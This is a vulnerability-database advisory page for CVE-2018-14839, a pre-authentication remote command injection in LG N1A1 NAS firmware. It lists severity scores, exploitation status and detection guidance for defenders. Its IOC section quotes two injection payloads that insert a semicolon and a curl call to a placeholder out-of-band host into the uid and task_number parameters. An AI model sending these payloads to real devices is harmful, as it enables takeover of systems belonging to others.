cbcvebase.
CVE-2018-14839
published 2019-05-14

CVE-2018-14839: LG N1A1 NAS 3718.510 is affected by: Remote Command Execution. The impact is: execute arbitrary code (remote). The attack vector is: HTTP POST with parameters.

PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
89.35%
99.8th percentile
LG N1A1 NAS 3718.510 is affected by: Remote Command Execution. The impact is: execute arbitrary code (remote). The attack vector is: HTTP POST with parameters.

Affected

1 ranges
VendorProductVersion rangeFixed in
lgn1a1_firmware

Detection & IOCsextracted from sources · hover to see the quote

path/system/sharedir.php
path/en/php/usb_sync.php
command&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
command&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
  • Monitor for HTTP POST requests to /system/sharedir.php or /en/php/usb_sync.php on LG NAS devices, particularly those containing shell metacharacters (semicolons) in the uid or task_number parameters, indicating command injection attempts.
  • The injection is pre-authentication — no valid session or credentials are required. Detect unauthenticated POST requests to the affected endpoints with parameter values containing command separators.
  • The attack uses the uid parameter in /system/sharedir.php and the task_number parameter in /en/php/usb_sync.php as injection points. Alert on values containing semicolons or other shell metacharacters in these fields.
  • Out-of-band detection: exploitation triggers outbound HTTP requests (e.g., curl) from the NAS device. Monitor for unexpected outbound HTTP connections originating from NAS devices.
  • Content-Type for the exploit is application/x-www-form-urlencoded. Correlate POST requests with this Content-Type to the vulnerable PHP endpoints.
  • ·The Nuclei template targets two distinct endpoints; both should be covered in detection rules as exploitation stops at the first successful match.
  • ·The affected version is specifically LG N1A1 NAS firmware 3718.510; detections should be scoped to this device/firmware where asset inventory is available.
  • ·This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active in-the-wild exploitation; prioritize detection and patching accordingly.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.